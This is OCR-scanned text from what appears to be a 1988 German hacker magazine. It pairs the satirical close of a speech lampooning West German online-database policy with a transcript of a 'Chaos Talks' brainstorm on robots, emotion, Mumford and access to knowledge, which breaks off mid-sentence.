Freistaat Bayern, sofern sie im öffentlichen Dienst beschäftigt sind, regelmäßig Aids-Reihen- 
untersuchungen unterziehen müssen. 

Der Bundesminister für Forschung und Technologie nutzt die schöpferische Pause zwi- 


sehen zwei luD-Programmen zur Verbesserung der luD-Rahmenbedingungen sowie zur Schaf¬ 
fung symbolträchtiger und marktfördernder Infrastruktureinrichtungen; Nachdem Pläne mißlun¬ 
gen waren, die GID FÜR 1 DM an einen Berliner Brotfabrikanten zu veräußern, wurden mittler¬ 
weile andere potente Anteilseigner gefunden, denen der Einstieg in die Gesellschaft durch außer¬ 
ordentliche Erträge auf Zeit geebnet wurde. Nun ist man dabei zu klären, mit welchen Aufgaben 
dieses Spezialistenteam betraut wird. 

Die wirtschaftliche Stellung privater Informationsvermittler soll durch ein Berufsmonopol 
abgesichert werden, ähnlich wie sich auch bereits die Arbeitsämter, Ärzte, Anwälte und Apothe¬ 
ker vor unliebsamer Konkurrenz schützen. Danach soll Informationsvermittlung nur der betreiben 
dürfen, der von einer Industrie- und Handelskammer als qualifiziert angesehen und insoweit ver¬ 
eidigt wird. 

Die Bonner Bannmeile um das Bundeshaus herum soll zu einer IVS-freien Zone erklärt wer¬ 
den, da in diesem Umkreis ohnehin niemand Online-Dienste nutzt und eine IVS-Aktivität die 
Beamten und Parlamentarier nur stören würde. Auch im neuen Deutschen Bundestag sitzt wie¬ 
der kein Abgeordneter mit Online-Kenntnissen. Die Bemühungen der Bundestagsverwaltung, 
ausgewählte Abgeordnete mit Online-Wissen auszustatten, dürfte daran scheitern, daß keine 
Stellen bewilligt werden und daß eine Informationsversorgung nur einzelner Abgeordneter gegen 
den Gleichheitsgrundsatz in der Verfassung verstößt. 

Sodann soll im Regierungsviertel ein Denkmal für den unbekannten Searcher errichtet wer¬ 
den. Es trägt die Inschrift “LOGOFF” und gibt Besuchern ausländischer Hosts Gelegenheit, 
durch eine Kranzniederlegung dem bundesdeutschen luD-Wesen ihr Mitgefühl auszudrücken. 
Eine bisher im niederrheinischen Kevelar angesiedelte Devotionalienhandlung wird hier einen 
Flohmarkt einrichten, in dem alte Manuals und Blue Sheets aus der jüngeren deutschen luD- 
Geschichte gehandelt werden. 

Schließlich ist der BMFT sich auch seiner sozialpolitischen Verantwortung bewußt und wird ein 
Searcher-Genesungswerk einrichten, unter dem Namen “Carriage Return e.V.”. Hier können 
nicht ruhegehaltsfähige Altsearcher eine Bleibe für den Lebensabend finden und in vertrautem 
Kreise GRIPS und GOLEM miteinander spielen. Nachdem Elly Heuss-Knapp, Wilhelmine Lübke 
und Hannelore Kohl bereits ähnliche karitative Aufgaben übernommen haben, konnte für die 
Schirmherrschaft des Carriage Return e.V. Beatrix Riesenhuber gewonnen werden. 

In seinen Bemühungen, sich frühzeitig für das Amt des FDP-Vorsitzenden zu profilieren, hat 
sich Minister Möllemann mit einem weiteren starken Hoffnungsträger im Kabinett, dem Pos’tmi- 
nister, verbündet; Die beiden wollen zwei Ziele miteinander verbinden - der heranwachsenden 
Jugend frühzeitig Diskotheken zu vermiesen und eine hörige Btx-Kundschaft heranzuzüchten. 
Zu diesem Zweck werden in Spielhallen die Flipperkästen durch Btx-Geräte ersetzt, auf denen 
man im Rechnerverbund THE SOURCE und anderen Hosts online Black Jack und U-Boot-Schie- 
ßen spielen kann. Um sich für dieses Geschäft sachkundig zu machen, hat Minister Schwarz- 
Schilling - wie könnte es anders sein - sich auch von einem nachgeordneten Institut, dem Wis¬ 
senschaftlichen Institut für Kommunikationsdienste, eine Angebotsstudie durchführen lassen. So 
weiß nun auch die Post endlich, daß es außer Btx noch einige andere elektronische Informations¬ 
dienste gibt, die in der Postwerbung bisher unberücksichtigt blieben. Diese Studie wird dem 
Minister und seinem Produkt Btx freilich keine schlaflosen Nächte bereiten: Die unliebsame Kon¬ 
kurrenz hält er sich unschwer durch lange Lieferzeiten für Modems und DATEX-Anschlüsse 
sowie durch eine Btx-orientierte Gebührenordnung vom Leib. 

Frohe Botschaften kommen auch von Norbert Blüm: Er hat in den Koalitionsgesprächen eine 
Lockerung des Nachtarbeitsverbots für Online-Searcher durchgesetzt, weil nachts die amerika¬ 
nischen Hosts bessere Responsezeiten bieten. Ferner soll Arbeitslosen durch eine längere Zah¬ 
lung von Überbrückungsgeld die Gründung einer selbständigen IVS erleichtert werden. 

Im Bereich der Außen-, Friedens- und Sicherheitspolitik ist Außenminister Genscher der¬ 
zeit bemüht, eine einheitliche Haltung der Bundesregierung zu erreichen: Um die amerikanischen 
Verbündeten nicht zu verärgern, strebt man eine doppelte Null-Lösung an: Die amerikanischen 
Langstreckenwaffen vom Typ DIALOG und MEAD dürfen weiterhin unser Land unter ihre Fittiche 
nehmen und zeigen, wo es lang geht. Als Gegenleistung wird die Bundesrepublik sich auf Kurz¬ 
streckendienste geringer Reichweite beschränken. STN bleibt hierbei außer Betracht, weil es den 
chemischen Waffen zuzurechnen ist und strategisch von Columbus, Ohio gesteuert wird. FIZ 
TECHNIK wurde vorsorglich rechtzeitig eidgenössisch neutralisiert. Das Hostpotential wird also 
weitgehend eingefroren, insbesondere in qualitativer Hinsicht. Stattdessen wird im Lande kräftig 
konventionell aufgerüstet. 





in diesen Bestrebungen wird die Bundesregierung tatkräftig durch die Bundesländer unter¬ 
stützt, die aus dem Verfassungsgebot der Kulturhoheit auch eigene luD-Gestaltungsrechte her¬ 
leiten. Der Prototyp des Hosts mit geringer Reichweite wurde vom Freistaat Bayern in Straubing 
errichtet. Über kurz oder lang wird es jedes Bundesland als Prestigeangelegenheit ansehen, 
einen echten Host zu betreiben. Wo es nicht zum Großrechner reicht, behilft man sich mit 
bescheideneren PC-Lösungen; auch daran kann man ja einige Jahre tüfteln. Insbesondere den 
Kultusverwaltungen scheint es große Befriedigung zu verschaffen, in den Hochschulen zahl¬ 
reiche Minidatenbanken entstehen zu sehen und zu finanzieren, entgegen dem Grundsatz der 
Wirtschaftlichkeit in der Verwaltung. Und selbst die Landwirtschaftsminister können kaum der 
Versuchung widerstehen, jeweils eine eigene Wirtschaftsdatenbank aufzubauen, und zwar für 
die Exportwirtschaft, in der blauäugigen Erwartung, Japaner oder Amerikaner würden darin 
Geschäftskontakte suchen. Unter dem Tisch reiben sich die akquisitionsfreudigen Hard- und 
Softwarehäuder die Hände, denn ihnen ist diese Art von Markt gerade recht. 

So entstehen derzeit in unserem Land Hunderte von elektronischen Schrebergärten, die 
sich von den traditionellen Papierdiensten nur dadurch unterscheiden, daß sie kostspieliger sind. 
Ein Nutrzen wird allenfalls innerhalb der eigenen vier Wände gesucht: Hessische Datenbanken 
für Hessen, niedersächsische für Niedersachsen. Gegen diese elektronische Zersiedelung unse¬ 
res Vaterlandes war die Aufteilung des Reiches in 16 FIZ in den 70er Jahren eine vergleichsweise 
harmlose Angelegenheit. 

Die Studenten in unserem Land bleiben indessen von den echten Online-Errungenschaften 
weitgehend abgeschirmt. luD-Fachvorlesungen gibt es nur an einigen wenigen Plätzen. Der Nor¬ 
malstudent lebt weiterhin aus dem Karteikasten in der UB. Haufenweise werden jetzt Lehrstühle 
für Informatik oder gar Wirtschaftsinformatik eingerichtet, kaum einer hingegen für Informations¬ 
praxis und -management. Die Berufenen sind Profis in Hard- und Software, aber Laien im welt¬ 
weiten Informationsgeschäft. 

In den Behörden und Unternehmen setzt sich das Dilemma fort: Die Betriebsbuchhaltung 
erfreut sich fortgeschrittener EDV-Unterstützung, wo kein Aufwand gescheut wird. Der Regie¬ 
rungsrat oder der Bereichsleiter, der mit denselben Endgeräten Online-Dienste nutzen möchte, 
muß hingegen um seine weitere Karriere fürchten. Bei der innerbetrieblichen Informationsversor¬ 
gung befinden wir uns noch in den frühen 70er Jahren; trotz der vielleicht 1.000 Unternehmen, 
die bereits die Zeichen der Zeit erkannt haben. 

Ein bemerkenswertes Beispiel für diese Art Schrebergartenelektronik zeigen auch die 70 Indu¬ 
strie- und Handelskammern im Lande, wenn man einmal von den IHK-Ausgliederungen OTTl, 
tbr und TVA absieht; Die ansonsten eingerichteten Datenbankdienste führen überall eher ein 
Schatten- und Alibidasein, als daß sie dem IHK-Auftrag der regionalen Wirtschaftsförderung 
gerecht würden. 

Man spart zwar nicht an festlichen Ansprachen zum technischen Fortschritt, wie gestern 
abend, als die Deutsche Gruppe der Internationalen Handelskammer im Intercontinental Hanno¬ 
ver ein feierliches Bekenntnis zum weltweit gespeicherten Wissen ablegte, mit Abendessen zum 
Preis von 100 DM entsprechend 0.3 Std. Anschlußzeit bei einem Host. Zum Cocktail durfte Chef- 
Searcher Klaus Engelhardt die Gäste am Keyboard entertainen. An der Basis sieht es jedoch 
anders aus: Man scheint gerade Wirtschaftsdatenbanken und ihre privaten Anbieter wie die Pest 
zu fürchten, weil man meint, die Mitglieder würden sich mit ihren Informationswünschen von den 
Kammern abwenden, wenn das so weiter geht. 

So ringt man denn auch mit Mühen und seit Jahren um eine eigene Firmendatenbank: Die 
Stammdaten sind längst gespeichert, dienen sie doch der Ausstellung der Beitragsrechnungen. 
Der darauf aufbauende Herstellernachweis mit derzeit 40.000 Unternehmen kann bisher keinem 
etablierten Online-Firmennachweis Konkurrenz bieten. Dieses hindert die Kammern nicht, in 
ihren Mitgliedsblättern so zu tun, als ob hier erstmals eine deutsche Firmendatenbank entstehen 
würde, wie es sie in der Welt noch nicht gibt, unter Verschweigung derjenigen Dienste, welche 
einige ihrer Mitgliedsfirmen seit Jahren anbieten. Man feiert es als Erfolg, daß die Kammer Pforz¬ 
heim nun im Bestand der Kammer Bodensee-Oberschwaben recherchieren darf, ohne daß vorab 
die Zustimmung der dortigen Geschäftsführung eingeholt werden; muß, was vor geraumer Zeit 
noch Sitte war. Vorerst sollen auch nur Kammern das Privileg haben, im bundesweiten Kammer- 
informationssystem zu recherchieren, denn nur so ist gewährleistet, daß der Mittelständler wei¬ 
terhin erst die Kammer bitten muß, ihn mit den gewünschten Informationen zu versorgen. Eine 
Implementierung auf einem öffentiich zugänglichen Host dürfte auf absehbare keine Mehrheit fin¬ 
den, mögen auch einige mutige Kammern ausscheren und sich verselbständigen. 




Wenn also die Kammern eine derart restriktive und eigennützige Informationspolitik betreiben, 
braucht man sich nicht zu wundern, wenn der überwiegende Teil der Mittelständler seine Infor¬ 
mationen weiterhin bei Sprechtagen oder Jahresempfängen zu beschaffen sucht. Jedes Land 
hat eben den Informationsmarkt, den es verdient. 

Was hier über die Kammern gesagt wurde, gilt sinngemäß auch für die überwiegende Zahl der 
Fachverbände. Auch hier kann sich das Verbandsestablishment nur schwer mit dem Gedanken 
anfreunden, die Mitglieder könnten womöglich eines Tages die Verbandsinformationen nicht 
mehr nötig haben. Kammern und Verbänden wird es ebenso wie den Unternehmen selbst gehen; 
Wer bei der Informationsversorgung nicht alte und neue Medien zum Einsatz bringt, wird alsbald 
im Dunkeln wandeln. Die Wirtschaftsverbände täten gut daran, den Unternehmen zu zeigen, wo 
es lang geht, statt die guten alten Zeiten zu verteidigen. Sie könnten hier von einigen Kreditinsti¬ 
tuten viel lernen, die dabei sind, durch ein Angebot attraktiver Informationsdienstleistungen die 
Firmenkunden näher an sich zu binden. 

So wird also Außenminister Genscher noch geraume Zeit warten müssen, bis die deutsche 
Wirtschaft in der internationalen Online-Informationswelt den Stellenwert einnimmt, der ihr als 
führender Industrienation zukommt. Er hat freilich bei seinen diplomatischen Bemühungen um 
mehr Online-Resonanz in der Welt bereits einen achtbaren Erfolg errungen: Für viele unbemerkt 
hat Papst Johannes Paul II bei seiner diesjährigen Osteransprache den zahlreichen Onlinern auf 
dem Petersplatz und in aller Welt den Segen “urbi, orbi et flzibus" nicht nur in allen Landesspra¬ 
chen erteilt, sondern auch in STAIRS: Er sprach “Frohe ADJ Ostern”. Diese frohe Botschaft 
wollen wir auch heute aus dieser Frankfurter Messehalle in unserem Herzen mit nach Hause 
tragen. 

Die Zuversicht, daß es auch am deutschen Online-Markt nur aufwärts gehen kann, wird auch 
von FIZ TECHNIK und DATASTAR geteilt. Johannes Paul II (Rom), Peter Genth (Frankfurt) und 
Heinz Ochsner (DATASTAR) stimmen darin überein, daß den Onlinern die Zukunft gehört. Der 
Rechner in Bern hat genügend Kapazität, um auch noch den im Aufbau befindlichen Holy Ghost 
Host des Vatikans aufzunehmen, der nicht nur die Bibel online anbieten wird, sondern auch elek¬ 
tronische Ferntaufen, Fernhochzeiten und Fernbeerdigungen. So werden wir dort in Kürze eine 
postindustrielle Kultstätte haben, die uns fortan im Glauben an den großen Durchbruch stärken 
wird. 

In diesem Sinne rufe ich wieder allen Online-Brüdern und -Schwestern zu; 

DEUTSCHLAND LOGONl 











Chaos Talks 

Ausschnitte aus einem Brainstorming vom 9. 3.1988 

v: Vic (Genie) - w: Wau (Wau) - p: Poetronic (Dichter) 



Grippers made from a soft gel and wrapped in 
a rubberlike membrane will soon give robots 
the sensitivity of human hands 


w: Gibson beschreibt in “Neuromantics“ kon¬ 
sequent die Geschichte, daß man sich am Rüc¬ 
kenmark einstöpselt. Wenn man sich da in eine 
Datenbank reinhackt, die einem nicht zusteht, 
dann ist man gehirntot. Man ist nicht über die 
Tasten verbunden, sondern über den Stöpsel. 

p: Öd, wenn man da nicht kompatibel ist. 

w: Aber so auf der Ebene der ganzen kleinen 
Computer - In der “Byte“ war vor acht Jahren 
der Kleincomputer drauf, den du dir um die 
Hand schnallen kannst, als Uhr. Da war auf der 


Uhr zu lesen “insert disc“ und da gab’s eine 
pfenniggroße Diskette zum Reinschieben. Das 
auf der Titelseite, als Grafik. Aber klare Vision. 
Der nächste Punkt: Der Computer zum Auf¬ 
klappen. Den feuert man in die Ecke, dann 
entfaltet er sich, stellt die Beinchen hoch, da 
entfaltet sich ein Drucker, da entfaltet sich der 
Bildschirm.. 

p: Eine Düsentrieb-Maschine. Daniel Düsen¬ 
trieb baut ein Campingzelt, das so klein ist. 
Wenn du an der Schnur ziehst, hast du ein 
dreistöckiges Haus mit Badewanne. 





w Aber auf der Ebene ’Kofferklappelemente’ 
und 'Ausziehen’ läßt sich wohl einiges machen, 
ln dem Format eines Koffers müßte das in 
absehbarer Zeit unterzubringen sein. 

p- Ich denke, es wird darauf hinauslaufen; Kitt- 
1er hat geschrieben “Der Computer wird den 
Begriff 'Medien’ einkassieren, weil er alle Me¬ 
dien in sich vereinigt“. Da wird es irgendwann 
nur noch ein digitales Medium geben. Es 
herrscht doch eine Unzufriedenheit darüber, 
daß du heutzutage die einzelnen Medien noch 
getrennt hast. Man wünscht sich eine Art Zen¬ 
tralstation, wo du Fernseher, Radio, Video, 
Audio, Rechner vollkompatibel in einem Kasten 
hast. Einen Universal-Piayer. 

w: Und dann soll er wie ein Hund neben dir 
herrollen. 

p; Gut, dann können wir gleich weiterphanta¬ 
sieren. Du kannst noch einen Staubsauger ein¬ 
bauen, das Ding kann 'Guten Tag’ sagen, und 
du kannst ihm wie einer kleinen Cruise Missile 
beibringen, sich in deiner Wohnung zurecht¬ 
zufinden. 

v: Kannste nichts verdienen dran. 

w: Mir geht’s momentan nur um’s Phantasie¬ 
ren.. 

p: Vic hat insofern recht, als die Krea^vität in 
bestimmten Teilen schon auch vom Erwerb- 
strieb gesteuert wird. 

w: Aber irgendwann wird’s doch die Maschinen 
geben. 

v; Das ist die Frage, ob es das geben wird. 

p: Nun, wenn ein Markt da ist.. 

v: Aber es macht sie keiner. 

w: Wieso soll man sie denn nicht machen. Das 
versteh ich nicht recht. 

p: Kann man sie überhaupt schon machen? 
Das ist die Frage. 

v: Ja, man kann sie machen. 

p; Dann hast du ’ne VAX im Wohnzimmer 
rumfahren, sowas. 

w: Ja. Mindestens. Dann lieber so’n Transpu¬ 
terchen Wenn sich das dann noch teleskopisch 
ausfährt und so., auf derStraße hinterherfährt.. 


p;Solche Robotergibt’s ja schon. Aberdas sind 
eher Partygags. Ich hab’ auf der Buchmesse 
einen gesehen. Der war auch nochgefaked, mit 
einer Videokamera drin. Da saß einer in einem 
Verschlag und hat den ferngesteuert. 

v; Die Videokamera war auch nurFake. DerTyp 
stand daneben. Ich kenn die Dinger. 

p; Meinste, man kann da schon differenziertere 
Dinger bauen? 

w: Also, der Atari ist die billigste Lösung.. 

p: Der fährt doch nicht in der Wohnung rum. 

w: Das ist ja das Programm. Das Problem ist, 
daß solche Sachen nicht käuflich zu erwerberi 
sind, aber aus handelsüblichen Bauteilen zu¬ 
sammengesetzt werden können, 
p: Was könnte man sich denn da vorstellen? Ich 
meine, es wär schon witzig, wenn man so ein 
universaldomestiziertes Haustier hätte. Soll 
das alle Arbeiten, die sonst einer Hausfrau 
übertragen sind, übernehmen? Soll das mehr 
können? Soll das Sympathie erwecken? ich 
könnt mir schon vorstellen, mich mit so einer 
Maschine anzufreunden. 

v: Daß man sowas im Haushalt brauchen kann 
interessiert mich gar nicht. Was mich daran 
vielmehr interessiert, sind die psychologischen 
oder philosophischen Aspekte. Das find ioh 
interessanter. Ob das Ding fährt oder nicht \t 
mir völlig egal. ’ 

p: Dich interessiert also ein HIRN. 

v: Mich interessiert nur das Hirn. 

w; Das mobile Hirn. 

v; Braucht nicht mobil zu sein. Das kann auch 
in der Ecke liegen. Mich interessiert nur das 
Hirn. Seit vielen, vielen Jahren fasziniert mich 
der Gedanke der Zusammensetzung der Emo¬ 
tionen. Und da hab ich so ein paar verschiedene 
Hypothesen hingestellt.. 

p: Sag mal. Ich hab auch eine Hypothese. 

v; Die eine Hypothese ist, daß das eine Form 
von komplexer Logik ist. Daß also Gefühl kom¬ 
plexe Logik ist. 

w: Das ist Logik auf der Ebene der Musterer¬ 
kennung. Aber noch nicht erkannt. 

p: Mein Konzept von Emotionen ist: Ich nehme 
mal den biologischen Organismus. Jedes Or- 





gan sendet dauernd eine Zustandsmeldung 
aus in Form chemoelektrischer Signale, Bo¬ 
tenstoffe, sowas. In Form von Stofflichkeiten. 
Diese Emanationen der einzelnen Körperteile 
oder Organe - wenn du es ganz rationalistisch 
ohne Geist und Seele siehst - ergeben das, 
was man so 'emotionale Grundlage’ nennt. Das 
Gefühl. 

V. Mein Ansatz ist ein anderer. Ich bastel was 
zusammen, was fühlt. 

p: Dazu mußt du dir doch erstmal darüber klar 
sein, was Gefühle sind. 

v; Da ist eben die eine Hypothese, das sei eine 
komplexe Logik, die gar nicht soo komplex ist, 
aber komplex genug, um vom Vordergrund¬ 
verstand erfaßt werden zu können. 

p: Nimm als Modell deine eigenen Emotionen. 

v: Meinetwegen. Aber warum soll ich., ich mein, 
ich hab mein Modell doch schon gefunden. 

p: Ja, ’ne komplexe Logik. Aber von was..? 

v: Wie - von was? 

p: Wie-wie von was? 

(Heiterkeit) 

v: Was soll die Frage? ’Ne komplexe Logik ist 
’ne komplexe Logik. 

p: Logik ist ’ne Denkfunktion. ’Ne Gehirnfunk¬ 
tion. Keine emotionale Funktion. Ich weiß nicht, 
ob das Modell übertragbar ist.. 

v: Naiin..! Das hat mit Mustern überhaupt nichts 
zu tun. Du kommst da viel zu sehr von der 
deduktiven Seite her. 

p: Ich komm von der sprachlichen Seite. Die 
Sprache gibt auch ein Modell von Emotionen. 

v; Nein. Warum verbeißt du dich auf dieses 
Scheißmodell von Emotion. Stell dir einfach mal 
vor, ich will ’ne Emotion erklären. 

p; Das soll ja angeblich immer wieder mal 
versucht werden. 

v: Gut. 

p: Sie stehen auf meinem Fuß. Es tut mir weh. 
So die Art, nicht? 

v; Nein. Außerdem bringt das nichts, wenn du 


mir dauernd zwischenredest., 
p; Ich hör schon auf. 

v: ..sondern wenn ich mir überlege: Woraus 
besteht Emotion? Wenn ich mir Gedanken ma¬ 
che darüber: Woraus könnte Emotion beste¬ 
hen? Dann ist mir eine Hypothese eingefallen: 
Sie könnte aus Logik bestehen. Das nehmen 
wir einfach mal so als Hypothese hin. So. Diese 
Gesetze der Logik kann man ja normalerweise 
ganz gut erfassen, mit Hilfe von Computern, 
oder selber drüber nachdenken oder waswei- 
ßich. Man müßte daher eigentlich von der Ein¬ 
gabe zur Ausgabe kommen. D.h., man müßte 
diese Logik nachverfolgen können. Dadas aber 
äußerst schwierig ist, kann man diese Idee 
weiterspinnen und sagen: Die ist eben ein bi߬ 
chen komplizierter. Die kann man nicht einfach 
so durchrechnen. Und - wenn ich mir jetzt die 
richtigen Menschen ansehe, dann kann man 
manchmal von bestimmten Eingangsparame¬ 
tern auf die Ausgangsparameter schließen. 

p: Das heißt, wenn ich jemanden wie Kurt 
Waldheim sehe und sein Gesicht sehe, dann 
kann ich annehmen, daß er hinterhältig ist. 

v: Naiin! Wenn ich was reintue, dann kommt 
was raus. Das Verarbeitungsprogramm ist 
Emotion, okay. Also: Eingabe - Emotion - 
Ausgabe, das ist mal so das Modell, das grobe. 

w: Wenn ich ’mal so zurückgehe, dann ist also 
das jeweils gemeinsame historische Moment 
das Übertragen der jeweils fortgeschrittensten 
Technologie auf det Janze. Zu der Zeit, wo sie 
die Uhren hatten, da war die Erfindung des 
Perpetuum Mobile angesagt. Und da wurden 
dann Menschen, Maschinen und Puppen, ge¬ 
baut, mit hervorragend natürlichen Kurvenbe¬ 
wegungen, mechanisch relisiert. Die sehen 
echt aus. Wenn ich mir heut einen Roboter 
anschau, dann ist der echt Scheiße. Da war ein 
Menschenbild dahinter, das auch stark uhr¬ 
werkgesteuert war. 

p: Hast du ’mal Mumford gelesen, “Der Mythos 
der Maschine“? Es ist mir schwer vorstellbar, 
wie ein einzelner Mensch in einer Lebenszeit so 
viel an Gesamtwissen Zusammentragen kann, 
aus sämtlichen Natur- und Geisteswissen¬ 
schaften und der Literatur, und das noch ver¬ 
arbeiten kann. Das Buch geht vom aufrechten 
Gang bis zur Mondrakete, wobei er nebenbei 
noch wissenschaftliche Ansichten revidiert, 
z.B. daß in den Altertumswissenschaften bis¬ 
her viel zu gro ßes Augenmerk auf die Artefakte 
gelegt worden ist, die materiellen Funde. Was 
eigentlich passiert ist, ist in keiner Versteine- 





rung ©nthaltsn, z.B. das Ritual. Odar rauszu¬ 
finden, wie man eine Kaffeebohne richtig be¬ 
handelt, damit sie antörnt. Wenn du Urmensch 
bist stehste da vorerst im Wald. Das mußt du 
erstmal rausfinden, und das ist eine gewaltige 
Leistung, bedeutender als irgendwelches 
Steinchenklopfen. , . . ^ 

Oder die Zeit. Heutzutage stehen in jedem 
Zimmerdrei Digitaluhren rum. Herauszufinderi, 
wie du einen Kalender machst.. Ich stell mir 
manchmal vor, daß einige hunderttausend Jah¬ 
re lang Leute, die nachts Schwierigkeiten mit 
dem Einschlafen hatten, in die Sterne geguckt 
haben. Irgendwann muß jemandem aufgefal¬ 
len sein, daß sich da was ändert. Irgendwann 
viel, viel später muß jemandem aufgefallen 
seiti, daß sich da regelmäßig was ändert. Und 
dann muß sich jemand gesagt haben: das wol¬ 
len wir doch jetzt mal festhalten. 

Oder wenn du dir überlegst, was für eine Gro߬ 
tat die Entwicklung von einem Gefäß ist, ’nem 
Krug. Dazu mußt du vorausschauen können, 
das kann kein Tier. Ein Gefäß ist etwas, wo 
noch nichts drin ist. Da wird erst etwas rein¬ 
kommen. . ^ 

Das Hauptthema in dem Buch ist die Maschine. 
Wann ist die Maschine entstanden, der Mythos 
der Maschine? Mumford sagt; Die erste Ma¬ 
schine ist zusammengebaut worden im alten 
Ägypten, in der Pyramidenzeit. Das waren die 
ersten Pyramidenbaumeister, die diese Logi¬ 
stik bewältigt haben und eine Maschine aus 
menschlichen Teilen zusammengesetzt ha¬ 
ben. Diese ganze Transportproblematik, die 
Bautrups, die Leute in den Steinbrüchen, die 
Versorgung. Das war das erste Mal in der 
Menschheitsgeschichte, die erste Maschme. 
Nach und nach sind dann im Lauf der Ge¬ 
schichte die unzuverlässigen menschlichen 
Teile der Maschine durch mechanische ersetzt 


Und daß man heute - ich hab den Mumford 

noch ein bißchen weiterphantasiert - daß man 

heute viele Parallelen findet zum Pyramiden¬ 
zeitalter. Z.B. bei einem Atomkraftwerk, wie da 
mit den Tricks der Bronzezeitgötter gearbeitet 
wird. Der Mensch versucht, dem Sonnengott 
das Werkzeug aus der Hand zu nehmen. Diese 
kontrollierten Energien, die auf der Sonne vor 
sich gehen, zu zähmen und zu bändigen. Daß 
unsere Priesterkaste, die Wissenschaftler und 
Technologen, das will. 


w; In der Bibel heißt das 'Das eherne Meer’. 
Beim Tempelbau des Königs Salomon. Da ist 
der Guß schiefgegangen, die Zugabe von Was¬ 
sererfolgte nicht wie geplant. Das ganze haben 
noch Gesellen versiebt, die dem Meister die 
neue Braut nicht gegönnt haben, urtd da isser 
dann in dieses flüssige Meer hineingetaucht 


und wieder zurück. Also, flüssiges Metall von 
dieserGrößenordnung.so wie ich mirdasdann 
nach dieser biblischen Erzählung V9rgestellt 
habe, das hatte ich so in der Birne bei Tscher¬ 
nobyl. Da stehen schon sehr starke Visionen 
drin. 

p: Das anschaulichste Bild, das Mumford ver¬ 
wendet, ist der Vergleich zwischen altägypti¬ 
schen Pyramiden und Mondraketen. Beides 
sind Bauten einerGroßtechnologie. Das Innere 
einer Raumkapsel ist gleichzusetzen mit der 
innersten Kammer einer Pyramide, wo auch die 
miniaturisierte Ausrüstung für eine Reise in die 
Unendlichkeit steht. Und wenn du ’ne Mumie 
und ’nen Astronauten vergleichst, fallen die 
Ähnlichkeiten schon rein optisch auf. Beides 
sind Menschen in einem Zustand höchstmög¬ 
licher Reduktion der Lebensprozesse, was not¬ 
wendig ist, um solche außermenschlichen Be¬ 
reiche zu erfahren. Ein Astronaut trainiert jah¬ 
relang, seine Lebensfunktionen auf größt¬ 
mögliche Weise zu reduzieren, um diesen Be¬ 
dingungen, die im Raum herrschen, entge¬ 
genstehen zu können. 

Es gibt ja auch nix Irrationaleres als die Vor¬ 
stellung, auf den Mond zu fliegen. Das ist das 
unwirtlichste, menschenfeindlichste., das wu ß- 
te man schon vorher, daß da die Kälte ist, und 
Steine. 

w: Also, an der Hell-Dunkel-Grenze das Zelt 
aufzu sch lagen, das fand ich schon interessant 

p; Klar hat das eine gewisse Poesie. Ich mein©- 
bei den Pyramiden versteht heute auch keiner 
mehr, warum man die gebaut hat. 

Um nochmal zurückzukommen; Was ist die 
Konsequenz aus der fortschreitenden Com- 
putehsierung? Die Idealvorstellung von der Vof 
lautomatisierung? Es ist halt sehr die Frage, qk 
wir das wollen. Einzelmedien bringen es'mit 
sich, daß, wenn du z.B. fotografierst, die Be¬ 
reitschaft nachläßt, Bilder mit Aufmerksamkeit 
wahrzunehmen und zu behalten. Wenn du 
dauernd fotografierst, verlierst du dein visuelle^ 
Gedächtnis. 

w: Medialer Analphabetismus. 

p: Wenn wir nun also grob gesagt mit den 
Computern den Geist nach außen verlegen, 
oder das Bewußtsein, um das alles von Auto¬ 
maten erledigen zu lassen — daß wir vielleicht 
im Endzustand ausgeleert, mild lächelnd uricj 
haschischrauchend in der Ecke sitzen, und die 
Rechner treiben die Kulturentwicklung voran, 
ich mein’, ich hab mich schon mal gefragt, ob 
das dieses Gefühl, zu leben, ist; Diese leichte., 
auch wenns einem gut geht, wenn du grade 





gevögelt hast, gegessen hast und die Sonne 
scheint, trotzdem dieses leichte Gefühl von 
Last, von Anstrengung. Diese Anforderung, die 
Kulturgeschichte der Menschheit voranzutrei¬ 
ben, auch wenn du nur hustest. In diesen gan¬ 
zen mikroskopischen Einzelheiten. Es ist sehr 
die Frage, ob Rechner sowas jemals machen 
können, ob selbstmodifizierende Systeme wie 
die biologischen Organismen in digitaler oder 
elektronischer Form möglich sind. 

Und dann: Wir scheiden uns selber aus der 
Entwicklungsgeschichte aus. Wir sitzen dane¬ 
ben und schauen, wie die Apparate sich wei¬ 
terentwickeln und sind froh, daß wir nichts mehr 
machen müssen. Dann wird’s uns irgendwann 
nicht mehr gaben. Oder wir werden ’ne Art 
Parasiten der Maschinen. Was ist deine Sicht 
von der Zukunft der Computerei? 

w: Zugang zu Datenbanken und Wissen. 

p: Aber, Alter, schaut es nicht im Augenblick 
eher umgekehrt aus? Daß wir Wissen ver¬ 
stecken in Datenbanken, vergraben? Wissen, 
das keiner mehr suchen will oder kann, ent¬ 
weder weil es zu teuer ist, oder zu kompliziert? 

w: Es ist einfach zu teuer aus politischen Grün¬ 
den. Die Kommunikationspreise sind um den 
Faktor 1000 überteuert. 

p: Auch wenn’s nix kosten würde. Wenn du 
nicht mehr weißt, was du überhaupt suchen 
kannst.. 

w: Das Suchen wird künstlich behindert von den 
Staaten. Als die Amis hier einmarschiert sind, 
haben sie nicht nur das Patentamt ausgeräumt 
- da sind nur noch Mikrofilme da -, sondern es 
ist doch so, daß jeder Staat sein Patentwissen 
so gut hütet, daß jeder Staat für sich selber ein 
so absurdes Ordnungssystem hat, mit dem 
man zwar leben kann, mit dem man aber nichts 
finden kann. 

p: Ich hab mir schon mal überlegt, das wäreine 
Möglichkeit zur Arbeitsplatzbeschaffung, wenn 
die einzelnen User in den Datenbanken nicht 
qualvoll X Retrievalsprachen lernen müßten, 
sondern du nicht mehr an eine automatische 
Zutrittsmeldung kommst, sondern an einen 
Portier, einen richtigen Menschen. Wie an der 
Hotelrezeption. Ein Navigator. 

v: Gibt’s schon. 

p: Daß da einer sitzt, den du antickern kannst? 

v: Nicht nureiner. Da sitzt ein ganzesTeam. Bei 
"Delphi“. Die sind immer da, und wenn du 


irgendwie Probleme hast, kannst du die direkt 
anquatschen. 

p: Ach ja, das haben die doch von vornherein 
gemacht. So’n Operator. 

v: Nein, das sind keine Operators. Das sind 
Leute aus dem kultur- oder sprachwissen¬ 
schaftlichen Bereich, und wasweißich wofür. 
Fachleute. 

p: Die kennen sich auch mit den ganzen Re- 
trievals aus? 

v: Manchmal machen die auch gar kein Re- 
trieval. Manchmal schlagen die ein Buch auf. 

p: Man glaubt es kaum. 

w: ..oder telefonieren.. 

v: ..oder antworten einfach so. Find ich ’ne 
